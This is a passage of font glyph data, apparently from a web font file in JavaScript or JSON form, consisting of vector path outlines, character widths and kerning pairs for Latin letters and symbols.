,-116v0,69,-25,122,-99,122v-77,0,-100,-53,-100,-122v0,-69,25,-121,100,-121v76,0,99,51,99,121xm195,-116v0,-62,-17,-100,-72,-100v-55,0,-73,38,-73,100v0,62,18,102,73,102v56,0,72,-42,72,-102xm165,-248r-20,0r-22,-25v-12,10,-15,29,-42,25r32,-40r21,0","w":244},{"d":"162,-83v0,48,-17,87,-72,87v-55,0,-73,-39,-73,-87v0,-45,18,-85,73,-85v55,0,72,37,72,85xm138,-83v0,-40,-11,-67,-48,-67v-35,0,-49,27,-49,67v0,39,12,69,49,69v37,0,48,-29,48,-69xm132,-193r-19,0r-23,-26v-12,10,-15,30,-42,26r32,-40r21,0","w":178},{"d":"298,0r-114,0r-12,-69r-92,0r-39,69r-29,0r132,-233r151,0r0,21r-122,0r15,81r100,0r0,21r-96,0r16,89r90,0r0,21xm169,-89r-19,-110r-60,110r79,0","w":324},{"d":"59,-86r-30,0r0,-32r30,0r0,32","w":87},{"d":"184,-227r-7,23v-14,-6,-31,-12,-50,-12v-42,0,-58,28,-64,65r100,0r-6,21r-96,0r0,25r89,0r-6,20r-81,0v5,40,21,71,62,71v18,0,32,-6,51,-14r0,26v-70,25,-140,-9,-140,-83r-36,0r6,-20r28,0v-1,-8,-1,-16,0,-25r-34,0r6,-21r30,0v4,-70,75,-105,148,-76"},{"d":"239,0r-220,0r101,-233r18,0xm207,-20r-77,-184r-78,184r155,0","w":258},{"d":"107,-77r-97,0r0,-21r97,0r0,21","w":117},{"d":"153,0r-28,0r-76,-86r0,86r-24,0r0,-237r24,0r0,140r69,-68r27,0r-75,72","w":158,"k":{"o":9}},{"d":"235,-233r-30,36v35,75,22,203,-82,203v-32,0,-55,-9,-70,-25r-30,36r-17,-17r32,-38v-32,-77,-20,-199,85,-199v29,0,51,8,66,22r28,-33xm174,-197v-11,-12,-28,-19,-51,-19v-75,0,-82,90,-66,156xm123,-14v77,0,82,-99,63,-161r-117,137v11,15,29,24,54,24","w":244},{"d":"157,0r-135,0r-8,-22v33,-31,112,-91,112,-135v1,-59,-61,-52,-98,-29r-9,-23v59,-26,133,-21,133,51v0,51,-69,106,-104,137r109,0r0,21"},{"d":"57,0r-26,0r0,-233r26,0r0,233xm76,-291r-43,42r-18,0r34,-42r27,0","w":88},{"d":"123,-237v112,0,135,171,41,204r0,14r52,0r0,19r-75,0r0,-46v40,-6,53,-40,53,-84v0,-61,-29,-86,-71,-86v-40,0,-72,21,-72,86v0,45,14,79,54,84r0,46r-75,0r0,-19r52,0r0,-14v-41,-13,-58,-56,-58,-96v0,-68,36,-108,99,-108","w":246},{"d":"137,-181v0,43,-59,51,-59,89r0,33r-24,0r0,-35v0,-49,57,-53,57,-87v0,-47,-57,-38,-86,-22r-7,-23v46,-16,118,-23,119,45xm81,0r-29,0r0,-30r29,0r0,30","w":147},{"d":"81,46r-51,0r0,-289r51,0r0,18r-28,0r0,252r28,0r0,19","w":97},{"d":"209,-85v0,62,-27,91,-84,91v-63,0,-90,-30,-90,-92r0,-147r27,0r0,143v0,59,20,76,63,76v86,0,51,-139,58,-219r26,0r0,148xm146,-247r-19,0r-42,-42r26,0","w":244},{"d":"150,0r-21,0v0,-3,-6,-15,-6,-19v-20,35,-110,30,-106,-24v-5,-37,35,-61,104,-57v1,-29,-3,-50,-33,-50v-23,0,-41,6,-56,14r-8,-20v43,-17,121,-24,121,40v0,44,-2,75,5,116xm121,-36r0,-46v-50,-2,-84,8,-79,38v-3,38,68,37,79,8xm122,-233r-43,42r-19,0r35,-42r27,0","w":172},{"d":"275,-74r-113,0v-5,59,55,74,97,46r7,19v-40,21,-104,19,-116,-23v-9,22,-28,36,-60,36v-55,0,-73,-39,-73,-87v0,-45,18,-85,73,-85v33,0,51,14,60,36v9,-20,25,-36,55,-36v56,0,70,38,70,94xm252,-93v-1,-39,-15,-57,-46,-57v-26,0,-43,19,-45,57r91,0xm138,-83v0,-40,-11,-67,-48,-67v-35,0,-49,27,-49,67v0,39,12,69,49,69v37,0,48,-29,48,-69","w":292},{"d":"95,-237r-77,241r-22,0r77,-241r22,0","w":91},{"d":"120,-163r-35,65r35,65r-23,0r-34,-64r34,-66r23,0xm68,-163r-35,65r35,65r-23,0r-33,-64r33,-66r23,0","w":131},{"d":"170,0r-6,18v-70,-6,-45,-94,-49,-162r-56,0r0,144r-22,0r0,-144r-29,0r0,-21r155,0r0,21r-27,0r0,108v0,22,7,32,34,36"},{"d":"68,-233r-42,42r-19,0r35,-42r26,0xm50,0r-24,0r0,-165r24,0r0,165","w":74},{"d":"162,-165r-63,165r-21,0r-64,-165r26,0r49,134r49,-134r24,0","w":176,"k":{"\u00c1":9,"\u00c2":9,"\u0153":4,"\u00c3":9,"\u00c0":9,"\u00bf":3,"\u00f8":4,"\u00e6":4,"\u00c6":9,"\u00a2":4,"\u00fa":3,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00eb":4,"\u00ea":4,"\u00e8":4,"\u00e9":4,"\u00e7":4,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00c5":9,"s":4,"q":4,"o":4,"g":4,"e":4,"d":4,"c":4,"a":4,"Y":9,"T":9,"J":9,"A":9,".":19,",":19,"\u0161":4}},{"d":"153,-199r-82,199r-29,0r87,-198r-113,0r0,-21r128,0"},{"d":"95,4r-22,0r-77,-241r22,0","w":91},{"d":"156,-74r-114,0v-5,61,56,73,99,46r7,19v-19,9,-40,13,-61,13v-50,0,-70,-39,-70,-85v0,-38,15,-87,69,-87v54,0,70,38,70,94xm132,-93v-1,-39,-15,-57,-46,-57v-26,0,-42,19,-44,57r90,0xm122,-233r-43,42r-19,0r35,-42r27,0","w":173},{"d":"151,0r-24,0r0,-102v0,-25,-4,-48,-36,-48v-22,0,-36,20,-42,35r0,115r-24,0r0,-130v0,-14,-2,-22,-3,-35r20,0r6,25v6,-8,20,-28,46,-28v82,-2,51,97,57,168","w":176},{"d":"58,-133r-28,0r0,-30r28,0r0,30xm58,0r-28,0r0,-30r28,0r0,30","w":87},{"d":"149,-57v-1,70,-81,70,-136,54r9,-23v30,14,100,22,100,-31v0,-40,-29,-48,-69,-48r0,-20v37,0,63,-6,63,-41v-1,-54,-60,-38,-90,-21r-9,-23v47,-23,126,-19,126,44v0,33,-22,48,-48,51v25,4,54,18,54,58"},{"d":"157,-60v0,43,-27,60,-60,65r0,30r-21,0r0,-29v-21,0,-40,-5,-60,-10r9,-23v18,7,32,13,51,13r0,-97v-30,-11,-60,-24,-60,-65v0,-39,26,-56,60,-60r0,-33r21,0r0,32v15,1,34,3,51,9r-9,24v-12,-5,-23,-11,-42,-12r0,86v30,11,60,26,60,70xm76,-139r0,-76v-21,4,-34,16,-34,39v0,21,15,29,34,37xm131,-60v0,-23,-16,-34,-34,-42r0,85v17,-5,34,-17,34,-43"},{"d":"129,-141v-10,1,-18,0,-18,-10v-12,18,-67,16,-64,-14v-3,-20,21,-34,62,-32v7,-32,-38,-25,-53,-16r-5,-13v26,-10,76,-13,75,22v0,24,-1,41,3,63xm85,-150v19,0,28,-12,25,-35v-27,-1,-46,3,-46,20v0,10,8,15,21,15"},{"d":"58,0r-28,0r0,-30r28,0r0,30","w":87,"k":{"y":22,"w":31,"v":22,"Y":22,"W":22,"V":22}},{"d":"195,0r-32,0r-77,-104r-24,0r0,104r-27,0r0,-233v71,1,147,-14,147,63v0,34,-15,63,-65,65xm155,-170v3,-46,-47,-44,-93,-42r0,87v47,3,100,0,93,-45","w":211},{"d":"162,-53v0,49,-40,58,-75,58v-34,0,-74,-10,-74,-58v0,-32,21,-53,53,-62v-10,-5,-45,-18,-45,-52v0,-37,26,-56,68,-56v43,0,68,15,68,56v0,33,-35,49,-48,52v34,11,53,30,53,62xm131,-166v0,-27,-14,-37,-42,-37v-27,0,-43,10,-43,37v0,23,25,37,41,42v18,-4,44,-19,44,-42xm136,-54v0,-31,-26,-44,-48,-51v-22,7,-49,18,-49,51v0,26,19,40,48,40v28,0,49,-13,49,-40"},{"d":"163,-89r-64,0r0,46r-23,0r0,-46r-63,0r0,-20r63,0r0,-44r23,0r0,44r64,0r0,20xm163,0r-150,0r0,-21r150,0r0,21"},{"d":"161,-165r-69,191v-9,26,-20,39,-50,49r-8,-20v38,-8,33,-35,46,-62r-66,-158r26,0r52,131r45,-131r24,0xm129,-202r-23,0r0,-26r23,0r0,26xm75,-202r-24,0r0,-26r24,0r0,26","w":174},{"d":"266,0r-25,0r0,-204r-80,204r-21,0r-81,-204r0,204r-24,0r0,-233r41,0r76,196r76,-196r38,0r0,233","w":301},{"d":"102,-145v-1,38,-52,39,-84,29r5,-14v17,7,61,14,61,-15v0,-22,-18,-26,-42,-26r0,-13v22,0,39,-2,39,-21v0,-29,-38,-19,-55,-10r-5,-14v26,-13,80,-12,78,23v0,18,-15,27,-30,29v15,2,33,10,33,32","w":119},{"d":"109,42v-99,-3,-36,-124,-92,-128r0,-19v55,-2,-8,-125,92,-128r0,20v-72,0,-20,96,-69,118v50,18,-2,118,69,118r0,19","w":128},{"d":"195,0r-32,0r-60,-100r-63,100r-28,0r77,-120r-68,-113r31,0r53,90r56,-90r29,0r-72,111","w":208,"k":{"\u00d2":9,"\u00d4":9,"\u00d3":9,"\u0152":9,"\u00d5":9,"\u00d6":9,"\u00c7":9,"y":9,"w":9,"v":9,"Q":9,"O":9,"G":9,"C":9,"\u00fd":9}},{"d":"174,-212r-70,0r0,212r-26,0r0,-212r-69,0r0,-21r165,0r0,21","w":182,"k":{"\u0131":31,"\u00d2":9,"\u00d4":9,"\u00d3":9,"\u00c1":31,"\u00c2":31,"\u00b7":31,"\u00ff":31,"\u0153":31,"\u0152":9,"\u00d5":9,"\u00c3":31,"\u00c0":31,"\u00f8":31,"\u00e6":31,"\u00b5":31,"\u00c6":31,"\u00a2":31,"\u00fc":31,"\u00fb":31,"\u00f9":31,"\u00fa":31,"\u00f5":31,"\u00f6":31,"\u00f4":31,"\u00f2":31,"\u00f3":31,"\u00f1":31,"\u00eb":31,"\u00ea":31,"\u00e8":31,"\u00e9":31,"\u00e7":31,"\u00e5":31,"\u00e3":31,"\u00e4":31,"\u00e2":31,"\u00e0":31,"\u00e1":31,"\u00d6":9,"\u00c7":9,"\u00c5":31,"\u00c4":31,"z":31,"y":31,"x":31,"w":31,"v":31,"u":31,"s":31,"r":31,"q":31,"p":31,"o":31,"n":31,"m":31,"j":9,"i":9,"g":31,"e":31,"d":31,"c":31,"a":31,"Q":9,"O":9,"J":19,"G":9,"C":9,"A":19,"@":9,";":31,":":31,".":31,",":31,"\u017e":31,"\u00fd":31,"\u0161":31}},{"d":"312,0v-64,1,-132,6,-189,6v-77,0,-100,-53,-100,-122v0,-81,46,-137,133,-117r153,0r0,21r-120,0v20,18,28,49,29,81r83,0r0,21r-83,0v0,35,-8,69,-28,89r122,0r0,21xm191,-116v0,-62,-14,-100,-68,-100v-55,0,-73,38,-73,100v0,62,18,102,73,102v55,0,68,-42,68,-102","w":337},{"d":"156,-74r-114,0v-5,61,56,73,99,46r7,19v-19,9,-40,13,-61,13v-50,0,-70,-39,-70,-85v0,-38,15,-87,69,-87v54,0,70,38,70,94xm132,-93v-1,-39,-15,-57,-46,-57v-26,0,-42,19,-44,57r90,0xm105,-191r-18,0r-43,-42r27,0","w":173},{"d":"167,0r-132,0r0,-233r129,0r0,21r-102,0r0,81r95,0r0,21r-95,0r0,89r105,0r0,21xm143,-248r-20,0r-22,-25v-12,10,-16,29,-43,25r32,-40r21,0","w":192},{"d":"178,-211r-133,190r130,0r0,21r-151,0r-8,-22r133,-190r-119,0r0,-21r139,0xm142,-289r-32,40r-21,0r-31,-40r19,0r23,26v12,-10,15,-30,42,-26","w":194},{"d":"259,-74r-114,0v-5,60,55,74,98,46r7,19v-38,20,-103,18,-116,-19v-20,45,-113,45,-117,-15v-2,-38,35,-61,105,-57v2,-29,-4,-50,-34,-50v-23,0,-41,6,-56,14r-8,-20v34,-13,100,-23,114,15v10,-16,26,-27,51,-27v56,0,70,38,70,94xm235,-93v-1,-39,-15,-57,-46,-57v-26,0,-42,19,-44,57r90,0xm122,-41r0,-41v-50,-2,-80,7,-80,38v0,18,13,30,37,30v19,0,35,-14,43,-27","w":276},{"d":"134,-145r-94,127r90,0r0,18r-108,0r-9,-20r95,-126r-86,0r0,-19r104,0","w":147},{"d":"222,-116v0,69,-25,122,-99,122v-77,0,-100,-53,-100,-122v0,-69,25,-121,100,-121v76,0,99,51,99,121xm200,21r-9,20r-77,-11r10,-16xm195,-116v0,-62,-17,-100,-72,-100v-55,0,-73,38,-73,100v0,62,18,102,73,102v56,0,72,-42,72,-102","w":244},{"d":"216,0r-30,0r-24,-69r-96,0r-26,69r-28,0r95,-233r21,0xm155,-89r-39,-111r-43,111r82,0xm147,-288r-42,42r-19,0r35,-42r26,0","w":227},{"d":"79,-204r-83,0r0,-21r83,0r0,21","w":74},{"d":"145,-60v0,-65,-124,-38,-121,-116v3,-64,82,-70,140,-52r-9,24v-29,-19,-104,-18,-104,28v0,23,22,32,46,41v35,12,75,25,75,75v0,77,-88,73,-148,56r9,-23v40,17,112,26,112,-33xm140,-291r-32,39r-21,0r-31,-39v26,-4,30,15,42,25v12,-10,15,-29,42,-25","w":197},{"d":"153,0r-21,0r-5,-24v-3,17,-56,42,-77,17r0,72r-24,0r0,-230r24,0r0,103v0,25,4,48,35,48v22,0,35,-24,41,-39r0,-112r23,0v1,55,-4,117,4,165"},{"d":"197,-233r-81,128r0,105r-27,0r0,-103r-83,-130r30,0r68,105r65,-105r28,0xm143,-260r-23,0r0,-27r23,0r0,27xm89,-260r-23,0r0,-27r23,0r0,27","w":202},{"d":"171,-143r-38,0r-10,56r34,0r0,18r-37,0r-12,69r-22,0r12,-69r-40,0r-12,69r-22,0r12,-69r-31,0r0,-18r35,0r9,-56r-30,0r0,-18r34,0r12,-72r22,0r-12,72r39,0r13,-72r22,0r-13,72r35,0r0,18xm111,-143r-40,0r-9,56r39,0"},{"d":"236,-32r-19,0r0,32r-18,0r0,-32r-52,0r-6,-13r59,-75r17,0r0,75r19,0r0,13xm204,-226r-130,226r-23,0r131,-226r22,0xm100,-145v-1,38,-52,39,-83,29r5,-14v16,7,61,14,60,-15v0,-22,-17,-26,-41,-26r0,-13v22,0,38,-2,38,-21v-1,-30,-38,-18,-55,-10r-5,-14v26,-13,78,-13,78,23v0,18,-14,27,-29,29v15,2,32,10,32,32xm199,-45r0,-56r-42,56r42,0","w":265},{"d":"156,-74r-114,0v-5,61,56,73,99,46r7,19v-19,9,-40,13,-61,13v-50,0,-70,-39,-70,-85v0,-38,15,-87,69,-87v54,0,70,38,70,94xm132,-93v-1,-39,-15,-57,-46,-57v-26,0,-42,19,-44,57r90,0","w":173},{"d":"108,-44v0,-43,-96,-25,-92,-78v4,-54,67,-54,112,-35r-8,19v-24,-16,-77,-22,-79,15v0,14,16,19,35,25v26,8,57,18,57,54v0,56,-76,55,-118,38r9,-20v29,16,84,21,84,-18","w":149},{"d":"163,-68r-150,60r0,-24r126,-51r-126,-49r0,-25r150,61r0,28"},{"d":"161,-165r-69,191v-9,26,-20,39,-50,49r-8,-20v38,-8,33,-35,46,-62r-66,-158r26,0r52,131r45,-131r24,0xm122,-233r-42,42r-19,0r35,-42r26,0","w":174,"k":{"\u00c1":9,"\u00c2":9,"\u0153":4,"\u00c3":9,"\u00c0":9,"\u00f8":4,"\u00e6":4,"\u00c6":9,"\u00a2":4,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00eb":4,"\u00ea":4,"\u00e8":4,"\u00e9":4,"\u00e7":4,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00c5":9,"\u00c4":9,"s":4,"q":4,"o":4,"g":4,"e":4,"d":4,"c":4,"a":4,"T":9,"J":19,"A":9,".":19,",":19,"\u0161":4}},{"d":"246,-60v0,32,-6,64,-46,64v-40,0,-45,-32,-45,-64v0,-31,9,-62,46,-62v40,0,45,30,45,62xm210,-226r-131,226r-22,0r130,-226r23,0xm111,-175v0,32,-7,64,-47,64v-40,0,-45,-32,-45,-64v0,-31,9,-62,46,-62v40,0,46,30,46,62xm229,-60v0,-26,-2,-48,-28,-48v-24,0,-28,26,-28,48v0,27,3,51,27,51v26,0,29,-24,29,-51xm93,-175v0,-26,-2,-49,-28,-49v-24,0,-28,27,-28,49v0,27,3,50,27,50v26,0,29,-23,29,-50","w":265},{"w":87},{"d":"102,-233r-3,78r-18,0r-3,-78r24,0xm52,-233r-3,78r-18,0r-3,-78r24,0","w":129},{"d":"76,-207r-23,0r0,-26r23,0r0,26xm22,-207r-23,0r0,-26r23,0r0,26","w":100},{"d":"102,-126r-28,0r0,-30r28,0r0,30xm163,-69r-150,0r0,-19r150,0r0,19xm102,-6r-28,0r0,-30r28,0r0,30"},{"d":"209,-85v0,62,-27,91,-84,91v-63,0,-90,-30,-90,-92r0,-147r27,0r0,143v0,59,20,76,63,76v86,0,51,-139,58,-219r26,0r0,148xm163,-248r-19,0r-22,-25v-12,10,-16,29,-43,25r32,-40r21,0","w":244},{"d":"56,-61r-24,0r0,-172r24,0r0,172xm58,0r-28,0r0,-30r28,0r0,30","w":87},{"d":"155,0r-20,0r-6,-19v-8,12,-23,23,-43,23v-52,0,-69,-40,-69,-87v0,-46,23,-85,66,-85v22,0,37,14,45,27r0,-96r24,0r0,187v0,21,1,29,3,50xm129,-40r0,-75v-20,-51,-88,-48,-88,33v0,69,60,90,88,42","w":176},{"d":"216,0r-30,0r-24,-69r-96,0r-26,69r-28,0r95,-233r21,0xm155,-89r-39,-111r-43,111r82,0xm158,-252r-19,0r-22,-25v-12,10,-16,29,-43,25r32,-39r21,0","w":227},{"d":"273,-138v0,66,-48,93,-107,93v-45,0,-76,-24,-76,-70v0,-48,51,-83,101,-64r0,70r12,-2r8,18r-41,6r0,-77v-30,-8,-56,10,-56,48v0,39,26,53,53,53v48,0,82,-19,82,-74v0,-59,-43,-82,-87,-82v-54,0,-108,29,-108,104v0,107,100,118,184,90r9,20v-105,31,-217,1,-217,-110v0,-80,57,-122,132,-122v53,0,111,30,111,99","w":302},{"d":"162,-83v0,48,-17,87,-72,87v-55,0,-73,-39,-73,-87v0,-45,18,-85,73,-85v55,0,72,37,72,85xm138,-83v0,-40,-11,-67,-48,-67v-35,0,-49,27,-49,67v0,39,12,69,49,69v37,0,48,-29,48,-69","w":178,"k":{"v":9}},{"d":"150,0r-21,0v0,-3,-6,-15,-6,-19v-20,35,-110,30,-106,-24v-5,-37,35,-61,104,-57v1,-29,-3,-50,-33,-50v-23,0,-41,6,-56,14r-8,-20v43,-17,121,-24,121,40v0,44,-2,75,5,116xm121,-36r0,-46v-50,-2,-84,8,-79,38v-3,38,68,37,79,8xm125,-195r-24,0r0,-28r24,0r0,28xm69,-195r-23,0r0,-28r23,0r0,28","w":172},{"d":"69,45r-51,0r0,-19r28,0r0,-252r-28,0r0,-18r51,0r0,289","w":97},{"d":"142,-7v-62,28,-125,0,-125,-74v0,-75,61,-104,124,-77r-8,20v-46,-26,-92,-8,-92,57v0,62,46,82,93,54","w":155},{"d":"209,-85v0,62,-27,91,-84,91v-63,0,-90,-30,-90,-92r0,-147r27,0r0,143v0,59,20,76,63,76v86,0,51,-139,58,-219r26,0r0,148xm163,-248r-24,0r0,-26r24,0r0,26xm108,-248r-23,0r0,-26r23,0r0,26","w":244},{"d":"167,0r-132,0r0,-233r129,0r0,21r-102,0r0,81r95,0r0,21r-95,0r0,89r105,0r0,21xm140,-248r-23,0r0,-26r23,0r0,26xm86,-248r-24,0r0,-26r24,0r0,26","w":192},{"d":"108,-44v0,-43,-96,-25,-92,-78v4,-54,67,-54,112,-35r-8,19v-24,-16,-77,-22,-79,15v0,14,16,19,35,25v26,8,57,18,57,54v0,56,-76,55,-118,38r9,-20v29,16,84,21,84,-18xm115,-233r-32,40r-21,0r-31,-40r19,0r23,26v12,-10,15,-30,42,-26","w":149},{"d":"160,-81v0,46,-20,85,-66,85v-21,0,-36,-11,-45,-23r0,84r-24,0r0,-180v0,-18,-1,-32,-3,-50r20,0r6,25v8,-13,25,-28,46,-28v50,0,66,40,66,87xm135,-82v0,-42,-13,-68,-46,-68v-20,0,-35,19,-41,35r0,76v8,11,18,25,44,25v25,0,43,-20,43,-68","w":176},{"d":"163,-97r-24,0r-52,-107r-51,107r-23,0r65,-136r19,0"},{"d":"163,-67r-64,0r0,67r-23,0r0,-67r-63,0r0,-20r63,0r0,-66r23,0r0,66r64,0r0,20"},{"d":"228,-32r-19,0r0,32r-18,0r0,-32r-52,0r-6,-13r59,-75r17,0r0,75r19,0r0,13xm195,-226r-132,226r-22,0r131,-226r23,0xm71,-113r-18,0r0,-102r-25,20r-5,-14v15,-9,21,-27,48,-24r0,120xm191,-45r0,-56r-43,56r43,0","w":265},{"d":"68,-191r-19,0r-42,-42r26,0","w":74},{"d":"80,-193r-20,0r-22,-26r-23,26r-20,0r32,-40r21,0xm49,0r-23,0r0,-165r23,0r0,165","w":74},{"d":"151,0r-24,0v-8,-55,25,-150,-36,-150v-23,0,-37,21,-42,35r0,115r-24,0r0,-237r24,0r0,97v7,-12,23,-28,46,-28v83,2,49,96,56,168","w":176},{"d":"250,-117v0,68,-53,121,-120,121v-67,0,-121,-53,-121,-121v0,-68,54,-120,121,-120v68,0,120,52,120,120xm233,-117v0,-58,-45,-104,-103,-104v-58,0,-103,46,-103,104v0,57,46,105,103,105v57,0,103,-48,103,-105xm185,-46r-21,0r-48,-63r-14,0r0,63r-17,0r0,-140v43,1,90,-9,92,37v0,20,-9,39,-41,40xm159,-149v3,-27,-31,-23,-57,-23r0,50v28,2,62,0,57,-27","w":259},{"d":"98,0r-8,21v-81,-10,-57,-88,-60,-167r-25,0r0,-19r25,0r0,-42r24,0r0,42r37,0r0,19r-37,0v7,60,-25,144,44,146","w":91},{"d":"167,24v0,33,-36,47,-76,47v-88,0,-96,-61,-45,-79v-27,-8,-28,-42,-6,-55v-26,-27,-32,-105,48,-105v29,0,46,3,78,0r-7,18r-23,0v34,31,22,108,-47,105v-9,0,-28,-4,-35,-8v-15,24,-14,28,41,34v60,6,72,20,72,43xm131,-108v0,-27,-14,-42,-42,-42v-29,0,-42,19,-42,43v0,25,13,43,42,43v31,0,42,-23,42,-44xm142,24v0,-14,-20,-20,-77,-25v-17,4,-26,17,-26,27v0,17,16,27,52,27v36,0,51,-11,51,-29","w":178},{"d":"180,-167v0,66,-52,73,-118,69r0,98r-27,0r0,-233v71,-1,145,-9,145,66xm153,-167v0,-53,-44,-44,-91,-45r0,93v48,0,91,7,91,-48","w":199,"k":{"J":29,"A":17}},{"d":"197,-233r-81,128r0,105r-27,0r0,-103r-83,-130r30,0r68,105r65,-105r28,0","w":202,"k":{"\u00d2":9,"\u00d4":9,"\u00d3":9,"\u00c1":19,"\u00c2":19,"\u0153":9,"\u0152":9,"\u00d5":9,"\u00c3":19,"\u00c0":19,"\u00f8":9,"\u00e6":9,"\u00d8":9,"\u00c6":19,"\u00a2":9,"\u00f5":9,"\u00f6":9,"\u00f4":9,"\u00f2":9,"\u00f3":9,"\u00eb":9,"\u00ea":9,"\u00e8":9,"\u00e9":9,"\u00e7":9,"\u00e5":9,"\u00e3":9,"\u00e4":9,"\u00e2":9,"\u00e0":9,"\u00e1":9,"\u00d6":9,"\u00c7":9,"\u00c5":19,"\u00c4":19,"s":9,"q":9,"o":9,"g":9,"e":9,"d":9,"c":9,"a":9,"O":9,"J":19,"G":9,"C":9,"A":19,".":19,",":19,"\u00fd":9,"\u0161":9}},{"d":"216,0r-30,0r-24,-69r-96,0r-26,69r-28,0r95,-233r21,0xm155,-89r-39,-111r-43,111r82,0","w":227,"k":{"\u00d9":4,"\u00db":4,"\u00da":4,"\u00d2":9,"\u00d4":9,"\u00d3":9,"\u0178":19,"\u00ff":19,"\u0153":4,"\u0152":9,"\u00d5":9,"\u00e6":4,"\u00a2":4,"\u00fc":4,"\u00fb":4,"\u00f9":4,"\u00fa":4,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00eb":4,"\u00ea":4,"\u00e8":4,"\u00e9":4,"\u00e7":4,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00dc":4,"\u00d6":9,"\u00c7":9,"y":19,"w":19,"v":19,"u":4,"t":4,"q":4,"o":4,"e":4,"d":4,"c":4,"a":4,"Y":19,"W":19,"V":19,"T":19,"Q":4,"O":4,"G":4,"C":4,"@":9,"&":9,"\u00fd":19,"\u00dd":19}},{"d":"206,0r-34,0r-110,-112r0,112r-27,0r0,-233r27,0r0,106r103,-106r29,0r-108,111","w":212,"k":{"\u00d9":4,"\u00db":4,"\u00da":4,"\u00d2":9,"\u00d3":9,"\u00ff":19,"\u0153":9,"\u0152":9,"\u00d5":9,"\u00e6":9,"\u00a2":9,"\u00fc":9,"\u00fb":9,"\u00f9":9,"\u00fa":9,"\u00f5":-9,"\u00f6":9,"\u00f4":9,"\u00f2":9,"\u00f3":9,"\u00eb":9,"\u00ea":9,"\u00e8":9,"\u00e9":9,"\u00e7":9,"\u00e5":9,"\u00e3":9,"\u00e4":9,"\u00e2":9,"\u00e0":9,"\u00e1":9,"\u00dc":4,"\u00d6":9,"y":19,"w":19,"v":19,"u":9,"q":9,"o":9,"e":9,"d":9,"c":9,"a":9,"U":4,"Q":9,"O":9,"G":9,"C":9,"@":9,"&":4}},{"d":"55,-129r-23,0r0,-84r23,0r0,84xm55,28r-23,0r0,-84r23,0r0,84","w":87},{"d":"222,-116v0,69,-25,122,-99,122v-77,0,-100,-53,-100,-122v0,-69,25,-121,100,-121v76,0,99,51,99,121xm195,-116v0,-62,-17,-100,-72,-100v-55,0,-73,38,-73,100v0,62,18,102,73,102v56,0,72,-42,72,-102xm162,-288r-42,42r-19,0r35,-42r26,0","w":244},{"d":"159,-102v0,53,-12,107,-74,107v-41,0,-69,-34,-69,-74v0,-75,93,-101,119,-38v0,-44,-12,-74,-40,-92r-31,21r-19,-11r28,-19v-10,-4,-21,-7,-33,-9r-9,-23v25,3,46,8,64,17r27,-19r19,11r-27,19v31,22,45,57,45,110xm131,-87v-5,-13,-18,-36,-47,-36v-33,0,-41,25,-41,54v0,34,17,54,42,54v30,0,46,-16,46,-72"},{"d":"50,-205r-26,0r0,-28r26,0r0,28xm49,0r-23,0r0,-165r23,0r0,165","w":74},{"d":"203,-117v0,109,-63,123,-168,117r0,-122r-25,0r0,-19r25,0r0,-92v104,-5,168,7,168,116xm176,-117v0,-86,-37,-99,-114,-95r0,71r54,0r0,19r-54,0r0,101v76,5,114,-15,114,-96","w":226,"k":{"A":4}},{"d":"203,-117v0,109,-63,123,-168,117r0,-233v104,-5,168,7,168,116xm176,-117v0,-86,-37,-99,-114,-95r0,191v76,5,114,-15,114,-96","w":226,"k":{"V":3,"J":7}},{"d":"76,-204r-23,0r0,-27r23,0r0,27xm22,-204r-23,0r0,-27r23,0r0,27xm50,0r-24,0r0,-165r24,0r0,165","w":74},{"d":"216,0r-30,0r-24,-69r-96,0r-26,69r-28,0r95,-233r21,0xm155,-89r-39,-111r-43,111r82,0xm167,-272v-5,13,-15,24,-31,24v-18,-4,-45,-27,-51,1r-16,-6v11,-36,44,-23,66,-11v9,0,14,-9,16,-15","w":227},{"d":"162,-111v0,59,-8,116,-75,116v-66,0,-74,-58,-74,-116v0,-56,13,-112,74,-112v66,0,75,54,75,112xm135,-111v0,-50,-3,-92,-48,-92v-42,0,-47,50,-47,92v0,51,3,96,47,96v46,0,48,-48,48,-96"},{"d":"58,-27r-29,64r-19,0r20,-64r28,0","w":87},{"d":"119,-161r-8,20v-6,-5,-16,-9,-26,-9v-20,0,-31,33,-36,43r0,107r-24,0r0,-128v0,-16,-2,-29,-3,-37r20,0r6,34v6,-12,21,-37,41,-37v14,0,24,3,30,7","w":123,"k":{".":19}},{"d":"168,0r-133,0r0,-233r27,0r0,211r106,0r0,22","w":171,"k":{"Y":35,"W":23,"V":26,"T":23,"O":7}},{"d":"168,-60r-34,0r0,60r-27,0r0,-60r-87,0r-9,-22r97,-137r26,0r0,138r34,0r0,21xm107,-81r0,-106r-75,106r75,0"},{"d":"152,0r-21,0r-5,-24v-6,8,-19,28,-45,28v-80,1,-51,-98,-56,-169r24,0r0,103v0,25,4,48,35,48v22,0,35,-20,41,-35r0,-116r23,0v1,55,-4,117,4,165xm126,-199r-24,0r0,-27r24,0r0,27xm71,-199r-23,0r0,-27r23,0r0,27","w":173},{"d":"240,0r-82,0r-5,-14v20,-17,68,-48,68,-72v0,-32,-40,-24,-60,-14r-5,-15v35,-15,83,-12,83,29v0,28,-42,55,-63,72r64,0r0,14xm194,-226r-130,226r-23,0r130,-226r23,0xm70,-113r-18,0r0,-102r-24,20r-5,-14v15,-8,21,-27,47,-24r0,120","w":265},{"d":"80,46r-21,0v-57,-86,-47,-200,-2,-279r21,0v-44,86,-47,188,2,279","w":99},{"d":"158,-27r-15,16r-55,-55r-55,55r-15,-16r54,-54r-54,-55r15,-16r55,55r55,-55r15,16r-54,55"},{"d":"167,0r-149,0r0,-22r25,0r0,-97r-26,0r0,-20r26,0v-4,-79,50,-98,94,-103r7,23v-38,3,-80,15,-75,80r63,0r0,20r-63,0r0,97r98,0r0,22"},{"d":"76,-113r-18,0r0,-102r-24,20r-6,-14v15,-9,21,-27,48,-24r0,120","w":119},{"d":"42,-233v46,78,56,193,-1,279r-22,0v51,-92,46,-193,2,-279r21,0","w":99},{"d":"143,-114v0,18,-10,30,-24,36v39,29,8,84,-43,84v-1